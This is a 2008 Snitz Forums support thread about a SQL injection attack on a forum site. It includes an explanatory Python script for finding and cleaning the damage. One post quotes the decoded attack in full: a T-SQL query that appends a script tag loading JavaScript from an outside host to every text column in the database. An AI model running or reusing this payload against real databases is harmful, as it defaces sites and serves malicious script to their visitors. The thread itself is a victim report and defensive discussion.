Snitz Forums 2000
 URL puzzle

Podge
Support Moderator

Ireland
3775 Posts

Posted - 13 May 2008 :  14:50:20
No problem. If it's a CMS you're after then try Umbraco.

Podge.

The Hunger Site - Click to donate free food | My Blog | Snitz 3.4.05 AutoInstall (Beta!)

My Mods: CAPTCHA Mod | GateKeeper Mod
Tutorial: Enable subscriptions on your board

Warning: The post above or below may contain nuts.

Mr Pink
Junior Member

United Kingdom
387 Posts

Posted - 14 May 2008 :  07:37:41
There was another attempt today. I posted the string into the convertor and it came up with this

quote:
?DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.direct84.com/7.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Martin
Leyland Forum Leyland Lancashire UK

AnonJr
Moderator

United States
5768 Posts

Posted - 14 May 2008 :  08:15:15
Persistent buggers.

Podge
Support Moderator

Ireland
3775 Posts

Posted - 14 May 2008 :  08:18:37
That's nasty. The query inserts a javascript into every text type column in your database.

Podge.

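Added example, not code from any poster or from Snitz: the quoted query rewrites each column as rtrim(convert(varchar, col)) plus a script tag, and SQL Server's CONVERT(varchar, ...) with no length returns at most 30 characters, so stripping the tag afterwards does not bring back longer text. This Python triage sketch models that effect on constructed rows and flags values that need a backup restore; the table and column names, the placeholder tag URL and the function names are assumptions.

```python
import re

# Constructed placeholder tag; the real one is in the quoted query above.
SAMPLE_TAG = "<script src=http://example.invalid/x.js></script>"
FULL_TAG = re.compile(r"<script\s+src=[^>]*>\s*</script>", re.IGNORECASE)
TAG_START = "<script src="
# SQL Server's CONVERT(varchar, x) with no length returns at most 30 characters.
DEFAULT_VARCHAR_LEN = 30


def model_update(value, tag=SAMPLE_TAG):
    """Model rtrim(convert(varchar, col)) + tag as run by the quoted query."""
    return value[:DEFAULT_VARCHAR_LEN].rstrip(" ") + tag


def triage(stored):
    """Return (cleaned_text, was_injected, possibly_truncated) for one value."""
    cleaned, hits = FULL_TAG.subn("", stored)
    injected = hits > 0
    # A repeat run re-truncates to 30 chars and can leave a cut-off tag start.
    for n in range(len(TAG_START), 1, -1):
        if injected and cleaned.lower().endswith(TAG_START[:n]):
            cleaned = cleaned[:-n]
            break
    # Heuristic: exactly 30 characters left means the text was probably cut.
    # rtrim can shorten a truncated value, so a shorter remainder proves nothing.
    truncated = injected and len(cleaned) == DEFAULT_VARCHAR_LEN
    return cleaned, injected, truncated


def scan(rows):
    """rows: iterable of (table, column, value); report injected values only."""
    findings = []
    for table, column, value in rows:
        cleaned, injected, truncated = triage(value)
        if injected:
            findings.append({"where": f"{table}.{column}", "cleaned": cleaned,
                             "restore_from_backup": truncated})
    return findings


# Constructed sample rows with hypothetical table/column names.
LONG_POST = "This reply is well over thirty characters long."
ROWS = [
    ("posts", "body", model_update(LONG_POST)),
    ("members", "name", model_update(model_update("a" * 27))),
    ("topics", "subject", "Untouched subject"),
]

if __name__ == "__main__":
    for finding in scan(ROWS):
        print(finding)
```
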

Astralis
Senior Member

USA
1218 Posts

Posted - 14 May 2008 :  12:12:35
That's exactly what happened to me. How did they get in? How to stop this??

Podge
Support Moderator

Ireland
3775 Posts

Posted - 14 May 2008 :  12:27:22
You need to sanitise all user input. Lots of stuff on Google.

Podge.

Snitz Forums 2000 © 2000-2021 Snitz™ Communications
Powered By: Snitz Forums 2000 Version 3.4.07